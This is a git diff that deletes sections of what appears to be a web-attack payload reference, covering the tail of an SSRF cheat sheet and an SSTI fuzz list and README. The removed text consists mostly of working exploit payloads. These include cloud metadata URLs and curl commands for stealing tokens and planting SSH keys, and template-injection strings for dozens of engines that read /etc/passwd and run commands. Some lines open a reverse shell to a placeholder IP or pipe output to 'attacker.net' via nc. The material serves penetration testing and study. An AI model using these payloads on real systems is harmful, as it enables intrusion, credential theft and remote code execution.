"http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" -``` - -Docs: https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html#runtimes-api-next - -### SSRF URL for Google Cloud - -:warning: Google is shutting down support for usage of the **v1 metadata service** on January 15. - -Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" - -```powershell -http://169.254.169.254/computeMetadata/v1/ -http://metadata.google.internal/computeMetadata/v1/ -http://metadata/computeMetadata/v1/ -http://metadata.google.internal/computeMetadata/v1/instance/hostname -http://metadata.google.internal/computeMetadata/v1/instance/id -http://metadata.google.internal/computeMetadata/v1/project/project-id -``` - -Google allows recursive pulls - -```powershell -http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true -``` - -Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn) - -```powershell -http://metadata.google.internal/computeMetadata/v1beta1/ -http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true -``` - -Required headers can be set using a gopher SSRF with the following technique - -```powershell -gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a -``` - -Interesting files to pull out: - -- SSH Public Key : `http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json` -- Get Access Token : `http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token` -- Kubernetes Key : `http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json` - -#### Add an SSH key - -Extract the token - -```powershell -http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json -``` - -Check the scope of the token - -```powershell -$ curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=ya29.XXXXXKuXXXXXXXkGT0rJSA - -{ - "issued_to": "101302079XXXXX", - "audience": "10130207XXXXX", - "scope": "https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/devstorage.read_write https://www.googleapis.com/auth/monitoring", - "expires_in": 2443, - "access_type": "offline" -} -``` - -Now push the SSH key. - -```powershell -curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCommonInstanceMetadata" --H "Authorization: Bearer ya29.c.EmKeBq9XI09_1HK1XXXXXXXXT0rJSA" --H "Content-Type: application/json" ---data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}' -``` - -### SSRF URL for Digital Ocean - -Documentation available at `https://developers.digitalocean.com/documentation/metadata/` - -```powershell -curl http://169.254.169.254/metadata/v1/id -http://169.254.169.254/metadata/v1.json -http://169.254.169.254/metadata/v1/ -http://169.254.169.254/metadata/v1/id -http://169.254.169.254/metadata/v1/user-data -http://169.254.169.254/metadata/v1/hostname -http://169.254.169.254/metadata/v1/region -http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address - -All in one request: -curl http://169.254.169.254/metadata/v1.json | jq -``` - -### SSRF URL for Packetcloud - -Documentation available at `https://metadata.packet.net/userdata` - -### SSRF URL for Azure - -Limited, maybe more exists? `https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/` - -```powershell -http://169.254.169.254/metadata/v1/maintenance -``` - -Update Apr 2017, Azure has more support; requires the header "Metadata: true" `https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service` - -```powershell -http://169.254.169.254/metadata/instance?api-version=2017-04-02 -http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text -``` - -### SSRF URL for OpenStack/RackSpace - -(header required? unknown) - -```powershell -http://169.254.169.254/openstack -``` - -### SSRF URL for HP Helion - -(header required? unknown) - -```powershell -http://169.254.169.254/2009-04-04/meta-data/ -``` - -### SSRF URL for Oracle Cloud - -```powershell -http://192.0.0.192/latest/ -http://192.0.0.192/latest/user-data/ -http://192.0.0.192/latest/meta-data/ -http://192.0.0.192/latest/attributes/ -``` - -### SSRF URL for Alibaba - -```powershell -http://100.100.100.200/latest/meta-data/ -http://100.100.100.200/latest/meta-data/instance-id -http://100.100.100.200/latest/meta-data/image-id -``` - -### SSRF URL for Kubernetes ETCD - -Can contain API keys and internal ip and ports - -```powershell -curl -L http://127.0.0.1:2379/version -curl http://127.0.0.1:2379/v2/keys/?recursive=true -``` - -### SSRF URL for Docker - -```powershell -http://127.0.0.1:2375/v1.24/containers/json - -Simple example -docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash -bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json -bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json -``` - -More info: - -- Daemon socket option: https://docs.docker.com/engine/reference/commandline/dockerd/#daemon-socket-option -- Docker Engine API: https://docs.docker.com/engine/api/latest/ - -### SSRF URL for Rancher - -```powershell -curl http://rancher-metadata// -``` - -More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/ - -## Labs - -* [Basic SSRF against the local server](https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost) -* [Basic SSRF against another back-end system](https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-system) -* [SSRF with blacklist-based input filter](https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter) -* [SSRF with whitelist-based input filter](https://portswigger.net/web-security/ssrf/lab-ssrf-with-whitelist-filter) -* [SSRF with filter bypass via open redirection vulnerability](https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection) - - -## References - -- [AppSecEU15-Server_side_browsing_considered_harmful.pdf](https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf) -- [Extracting AWS metadata via SSRF in Google Acquisition - tghawkins - 2017-12-13](https://hawkinsecurity.com/2017/12/13/extracting-aws-metadata-via-ssrf-in-google-acquisition/) -- [ESEA Server-Side Request Forgery and Querying AWS Meta Data](http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/) by Brett Buerhaus -- [SSRF and local file read in video to gif converter](https://hackerone.com/reports/115857) -- [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748) -- [SSRF in proxy.duckduckgo.com](https://hackerone.com/reports/358119) -- [Blind SSRF on errors.hackerone.net](https://hackerone.com/reports/374737) -- [SSRF on *shopifycloud.com](https://hackerone.com/reports/382612) -- [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF) -- [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648) -- [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html) -- [#HITBGSEC 2017 SG Conf D1 - A New Era Of SSRF - Exploiting Url Parsers - Orange Tsai](https://www.youtube.com/watch?v=D1S-G8rJrEk) -- [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/) -- [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748) -- [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/) -- [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf) -- [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow) -- [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/) -- [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51) -- [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158) -- [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a) -- [Hacker101 SSRF](https://www.youtube.com/watch?v=66ni2BTIjS8) -- [SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例](https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/) -- [SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1 - SaN ThosH - 10 Jan 2019](https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978) -- [SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst](https://www.silentrobots.com/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/) -- [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) -- [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/) -- [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf) -- [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet) -- [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/) -- [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html) -- [Attacking Url's in JAVA](https://blog.pwnl0rd.me/post/lfi-netdoc-file-java/) -- [SSRF: Don't encode entire IP](https://twitter.com/thedawgyg/status/1224547692967342080) diff --git a/Server Side Template Injection/Images/serverside.png b/Server Side Template Injection/Images/serverside.png deleted file mode 100644 index 4733bec..0000000 Binary files a/Server Side Template Injection/Images/serverside.png and /dev/null differ diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz deleted file mode 100644 index 97f5356..0000000 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ /dev/null @@ -1,108 +0,0 @@ - -{{4*4}}[[5*5]] -{{7*7}} -{{7*'7'}} -<%= 7 * 7 %> -${3*3} -${{7*7}} -@(1+2) -#{3*3} -#{ 7 * 7 } -{{dump(app)}} -{{app.request.server.all|join(',')}} -{{config.items()}} -{{ [].class.base.subclasses() }} -{{''.class.mro()[1].subclasses()}} -{{ ''.__class__.__mro__[2].__subclasses__() }} -{% for key, value in config.iteritems() %}
{{ key|e }}
{{ value|e }}
{% endfor %} -{{'a'.toUpperCase()}} -{{ request }} -{{self}} -<%= File.open('/etc/passwd').read %> -<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} -[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')} -${"freemarker.template.utility.Execute"?new()("id")} -{{app.request.query.filter(0,0,1024,{'options':'system'})}} -{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} -{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }} -{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}} -{{config.__class__.__init__.__globals__['os'].popen('ls').read()}} -{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%} -{$smarty.version} -{php}echo `id`;{/php} -{{['id']|filter('system')}} -{{['cat\x20/etc/passwd']|filter('system')}} -{{['cat$IFS/etc/passwd']|filter('system')}} -{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}} -{{request|attr(["_"*2,"class","_"*2]|join)}} -{{request|attr(["__","class","__"]|join)}} -{{request|attr("__class__")}} -{{request.__class__}} -{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}} -{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}} -{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}} -{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} -{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} -{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %} -${T(java.lang.System).getenv()} -${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} -${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}${self.module.cache.util.os.system("id")} -${self.module.runtime.util.os.system("id")} -${self.template.module.cache.util.os.system("id")} -${self.module.cache.compat.inspect.os.system("id")} -${self.__init__.__globals__['util'].os.system('id')} -${self.template.module.runtime.util.os.system("id")} -${self.module.filters.compat.inspect.os.system("id")} -${self.module.runtime.compat.inspect.os.system("id")} -${self.module.runtime.exceptions.util.os.system("id")} -${self.template.__init__.__globals__['os'].system('id')} -${self.module.cache.util.compat.inspect.os.system("id")} -${self.module.runtime.util.compat.inspect.os.system("id")} -${self.template._mmarker.module.cache.util.os.system("id")} -${self.template.module.cache.compat.inspect.os.system("id")} -${self.module.cache.compat.inspect.linecache.os.system("id")} -${self.template._mmarker.module.runtime.util.os.system("id")} -${self.attr._NSAttr__parent.module.cache.util.os.system("id")} -${self.template.module.filters.compat.inspect.os.system("id")} -${self.template.module.runtime.compat.inspect.os.system("id")} -${self.module.filters.compat.inspect.linecache.os.system("id")} -${self.module.runtime.compat.inspect.linecache.os.system("id")} -${self.template.module.runtime.exceptions.util.os.system("id")} -${self.attr._NSAttr__parent.module.runtime.util.os.system("id")} -${self.context._with_template.module.cache.util.os.system("id")} -${self.module.runtime.exceptions.compat.inspect.os.system("id")} -${self.template.module.cache.util.compat.inspect.os.system("id")} -${self.context._with_template.module.runtime.util.os.system("id")} -${self.module.cache.util.compat.inspect.linecache.os.system("id")} -${self.template.module.runtime.util.compat.inspect.os.system("id")} -${self.module.runtime.util.compat.inspect.linecache.os.system("id")} -${self.module.runtime.exceptions.traceback.linecache.os.system("id")} -${self.module.runtime.exceptions.util.compat.inspect.os.system("id")} -${self.template._mmarker.module.cache.compat.inspect.os.system("id")} -${self.template.module.cache.compat.inspect.linecache.os.system("id")} -${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")} -${self.template._mmarker.module.filters.compat.inspect.os.system("id")} -${self.template._mmarker.module.runtime.compat.inspect.os.system("id")} -${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")} -${self.template._mmarker.module.runtime.exceptions.util.os.system("id")} -${self.template.module.filters.compat.inspect.linecache.os.system("id")} -${self.template.module.runtime.compat.inspect.linecache.os.system("id")} -${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")} -${self.context._with_template._mmarker.module.cache.util.os.system("id")} -${self.template.module.runtime.exceptions.compat.inspect.os.system("id")} -${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")} -${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")} -${self.context._with_template.module.cache.compat.inspect.os.system("id")} -${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")} -${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")} -${self.context._with_template._mmarker.module.runtime.util.os.system("id")} -${self.context._with_template.module.filters.compat.inspect.os.system("id")} -${self.context._with_template.module.runtime.compat.inspect.os.system("id")} -${self.context._with_template.module.runtime.exceptions.util.os.system("id")} -${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")} -{{self._TemplateReference__context.cycler.__init__.__globals__.os}} -{{self._TemplateReference__context.joiner.__init__.__globals__.os}} -{{self._TemplateReference__context.namespace.__init__.__globals__.os}} -{{cycler.__init__.__globals__.os}} -{{joiner.__init__.__globals__.os}} -{{namespace.__init__.__globals__.os}} diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md deleted file mode 100644 index a0913f0..0000000 --- a/Server Side Template Injection/README.md +++ /dev/null @@ -1,1159 +0,0 @@ -# Server Side Template Injection - -> Template injection allows an attacker to include template code into an existing (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages - -## Summary - -- [Templates Injections](#templates-injections) - - [Summary](#summary) - - [Tools](#tools) - - [Methodology](#methodology) - - [ASP.NET Razor](#aspnet-razor) - - [ASP.NET Razor - Basic injection](#aspnet-razor---basic-injection) - - [ASP.NET Razor - Command execution](#aspnet-razor---command-execution) - - [Expression Language EL](#expression-language-el) - - [Expression Language EL - Basic injection](#expression-language-el---basic-injection) - - [Expression Language EL - One-Liner injections not including code execution](#expression-language-el---one-liner-injections-not-including-code-execution) - - [Expression Language EL - Code Execution](#expression-language-el---code-execution) - - [Java - Freemarker](#freemarker) - - [Freemarker - Basic injection](#freemarker---basic-injection) - - [Freemarker - Read File](#freemarker---read-file) - - [Freemarker - Code execution](#freemarker---code-execution) - - [Freemarker - Sandbox bypass](#freemarker---sandbox-bypass) - - [Groovy](#groovy) - - [Groovy - Basic injection](#groovy---basic-injection) - - [Groovy - Read and create File](#groovy---read-and-create-file) - - [Groovy - HTTP request:](#groovy---http-request) - - [Groovy - Command Execution](#groovy---command-execution) - - [Groovy - Sandbox Bypass](#groovy---sandbox-bypass) - - [JavaScript - Handlebars](#handlebars) - - [Handlebars - Command Execution](#handlebars---command-execution) - - [Jade / Codepen](#jade--codepen) - - [Java](#java) - - [Java - Basic injection](#java---basic-injection) - - [Java - Retrieve the system’s environment variables](#java---retrieve-the-systems-environment-variables) - - [Java - Retrieve /etc/passwd](#java---retrieve-etcpasswd) - - [Django Templates](#django-templates) - - [Python - Jinja2](#jinja2) - - [Jinja2 - Basic injection](#jinja2---basic-injection) - - [Jinja2 - Template format](#jinja2---template-format) - - [Jinja2 - Debug Statement](#jinja2---debug-statement) - - [Jinja2 - Dump all used classes](#jinja2---dump-all-used-classes) - - [Jinja2 - Dump all config variables](#jinja2---dump-all-config-variables) - - [Jinja2 - Read remote file](#jinja2---read-remote-file) - - [Jinja2 - Write into remote file](#jinja2---write-into-remote-file) - - [Jinja2 - Remote Code Execution](#jinja2---remote-code-execution) - - [Forcing output on blind RCE](#jinja2---forcing-output-on-blind-rce) - - [Exploit the SSTI by calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread) - - [Exploit the SSTI by calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen) - - [Exploit the SSTI by calling Popen without guessing the offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset) - - [Exploit the SSTI by writing an evil config file.](#exploit-the-ssti-by-writing-an-evil-config-file) - - [Jinja2 - Filter bypass](#jinja2---filter-bypass) - - [Java - Jinjava](#jinjava) - - [Jinjava - Basic injection](#jinjava---basic-injection) - - [Jinjava - Command execution](#jinjava---command-execution) - - [JavaScript - Lessjs](#lessjs) - - [Lessjs - SSRF / LFI](#lessjs---ssrf--lfi) - - [Lessjs < v3 - Command Execution](#lessjs--v3---command-execution) - - [Plugins](#plugins) - - [Python - Mako](#mako) - - [Direct access to os from TemplateNamespace:](#direct-access-to-os-from-templatenamespace) - - [Java - Pebble](#pebble) - - [Pebble - Basic injection](#pebble---basic-injection) - - [Pebble - Code execution](#pebble---code-execution) - - [Ruby](#ruby) - - [Ruby - Basic injections](#ruby---basic-injections) - - [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd) - - [Ruby - List files and directories](#ruby---list-files-and-directories) - - [Ruby - Code execution](#ruby---code-execution) - - [PHP - Smarty](#smarty) - - [PHP - Twig](#twig) - - [Twig - Basic injection](#twig---basic-injection) - - [Twig - Template format](#twig---template-format) - - [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading) - - [Twig - Code execution](#twig---code-execution) - - [Java - Velocity](#java---velocity) - - [Java - Spring](#java---spring) - - [PHP - patTemplate](#pattemplate) - - [PHP - PHPlib](#phplib-and-html_template_phplib) - - [PHP - Plates](#plates) - - [References](#references) - -## Tools - -Recommended tools: - -[Tplmap](https://github.com/epinna/tplmap) - Server-Side Template Injection and Code Injection Detection and Exploitation Tool - -e.g: - -```powershell -python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell -python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link" -python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade -``` - -[SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [Tplmap](https://github.com/epinna/tplmap) - -e.g: - -```powershell -python3 ./sstimap.py -u 'https://example.com/page?name=John' -s -python3 ./sstimap.py -u 'https://example.com/page?name=Vulnerable*&message=My_message' -l 5 -e jade -python3 ./sstimap.py -i -A -m POST -l 5 -H 'Authorization: Basic bG9naW46c2VjcmV0X3Bhc3N3b3Jk' -``` - -## Methodology - -![SSTI cheatsheet workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Images/serverside.png?raw=true) - ---- -## Detection - -In most cases, this polyglot payload will trigger an error in presence of a SSTI vulnerability : - -``` -${{<%[%'"}}%\. -``` - -## ASP.NET Razor - -[Official website](https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c) -> Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages. - -### ASP.NET Razor - Basic injection - -```powershell -@(1+2) -``` - -### ASP.NET Razor - Command execution - -```csharp -@{ - // C# code -} -``` - ---- - -## Expression Language EL - -[Official website](https://docs.oracle.com/javaee/6/tutorial/doc/gjddd.html) -> Expression Language (EL) is mechanism that simplifies the accessibility of the data stored in Java bean component and other object like request, session and application, etc. There are many operators in JSP that are used in EL like arithmetic and logical operators to perform an expression. It was introduced in JSP 2.0 - -### Expression Language EL - Basic injection - -```java -${} -${1+1} - -#{} -#{1+1} - -T() -``` - -### Expression Language EL - Properties - -* Interesting properties to access `String`, `java.lang.Runtime` - -```ps1 -${2.class} -${2.class.forName("java.lang.String")} -${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()} -``` - -### Expression Language EL - One-Liner injections not including code execution - -```java -// DNS Lookup -${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","xxxxxxxxxxxxxx.burpcollaborator.net")} - -// JVM System Property Lookup (ex: java.class.path) -${"".getClass().forName("java.lang.System").getDeclaredMethod("getProperty","".getClass()).invoke("","java.class.path")} - -// Modify session attributes -${pageContext.request.getSession().setAttribute("admin",true)} -``` - -### Expression Language EL - Code Execution - -```java -// Common RCE payloads -''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec() -''.class.forName('java.lang.ProcessBuilder').getDeclaredConstructors()[1].newInstance().start() - -// Method using Runtime -#{session.setAttribute("rtc","".getClass().forName("java.lang.Runtime").getDeclaredConstructors()[0])} -#{session.getAttribute("rtc").setAccessible(true)} -#{session.getAttribute("rtc").getRuntime().exec("/bin/bash -c whoami")} - -// Method using process builder -${request.setAttribute("c","".getClass().forName("java.util.ArrayList").newInstance())} -${request.getAttribute("c").add("cmd.exe")} -${request.getAttribute("c").add("/k")} -${request.getAttribute("c").add("ping x.x.x.x")} -${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())} -${request.getAttribute("a")} - -// Method using Reflection & Invoke -${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("calc.exe")} -${''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(''.getClass().forName('java.lang.Runtime')).exec('whoami')} - -// Method using ScriptEngineManager one-liner -${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")"))} - -// Method using JavaClass -T(java.lang.Runtime).getRuntime().exec('whoami').x - -// Method using ScriptEngineManager -${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))} -``` - ---- - -## Freemarker - -[Official website](https://freemarker.apache.org/) -> Apache FreeMarker™ is a template engine: a Java library to generate text output (HTML web pages, e-mails, configuration files, source code, etc.) based on templates and changing data. - -You can try your payloads at [https://try.freemarker.apache.org](https://try.freemarker.apache.org) - -### Freemarker - Basic injection - -The template can be : - -* Default: `${3*3}` -* Legacy: `#{3*3}` -* Alternative: `[=3*3]` since [FreeMarker 2.3.4](https://freemarker.apache.org/docs/dgui_misc_alternativesyntax.html) - -### Freemarker - Read File - -```js -${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('path_to_the_file').toURL().openStream().readAllBytes()?join(" ")} -Convert the returned bytes to ASCII -``` - -### Freemarker - Code execution - -```js -<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} -[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')} -${"freemarker.template.utility.Execute"?new()("id")} -#{"freemarker.template.utility.Execute"?new()("id")} -[="freemarker.template.utility.Execute"?new()("id")] -``` - -### Freemarker - Sandbox bypass - -:warning: only works on Freemarker versions below 2.3.30 - -```js -<#assign classloader=article.class.protectionDomain.classLoader> -<#assign owc=classloader.loadClass("freemarker.template.ObjectWrapper")> -<#assign dwf=owc.getField("DEFAULT_WRAPPER").get(null)> -<#assign ec=classloader.loadClass("freemarker.template.utility.Execute")> -${dwf.newInstance(ec,null)("id")} -``` - ---- - -## Groovy - -[Official website](https://groovy-lang.org/) - -### Groovy - Basic injection - -Refer to https://groovy-lang.org/syntax.html , but `${9*9}` is the basic injection. - -### Groovy - Read and create File - -```groovy -${String x = new File('c:/windows/notepad.exe').text} -${String x = new File('/path/to/file').getText('UTF-8')} -${new File("C:\Temp\FileName.txt").createNewFile();} -``` - -### Groovy - HTTP request: - -```groovy -${"http://www.google.com".toURL().text} -${new URL("http://www.google.com").getText()} -``` - -### Groovy - Command Execution - -```groovy -${"calc.exe".exec()} -${"calc.exe".execute()} -${this.evaluate("9*9") //(this is a Script class)} -${new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call()} -``` - -### Groovy - Sandbox Bypass - -```groovy -${ @ASTTest(value={assert java.lang.Runtime.getRuntime().exec("whoami")}) -def x } -``` - -or - -```groovy -${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x") } -``` - ---- - -## Handlebars - -[Official website](https://handlebarsjs.com/) -> Handlebars compiles templates into JavaScript functions. - -### Handlebars - Command Execution - -```handlebars -{{#with "s" as |string|}} - {{#with "e"}} - {{#with split as |conslist|}} - {{this.pop}} - {{this.push (lookup string.sub "constructor")}} - {{this.pop}} - {{#with string.split as |codelist|}} - {{this.pop}} - {{this.push "return require('child_process').execSync('ls -la');"}} - {{this.pop}} - {{#each conslist}} - {{#with (string.sub.apply 0 codelist)}} - {{this}} - {{/with}} - {{/each}} - {{/with}} - {{/with}} - {{/with}} -{{/with}} -``` - ---- - -## Jade / Codepen - -[Official website](https://codepen.io/) -> - -```python -- var x = root.process -- x = x.mainModule.require -- x = x('child_process') -= x.exec('id | nc attacker.net 80') -``` - -```javascript -#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout} -``` - ---- - -## Java - -### Java - Basic injection -> Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}`, `*{...}`, `@{...}` or `~{...}`. - -```java -${7*7} -${{7*7}} -${class.getClassLoader()} -${class.getResource("").getPath()} -${class.getResource("../../../../../index.htm").getContent()} -``` - -### Java - Retrieve the system’s environment variables - -```java -${T(java.lang.System).getenv()} -``` - -### Java - Retrieve /etc/passwd - -```java -${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} - 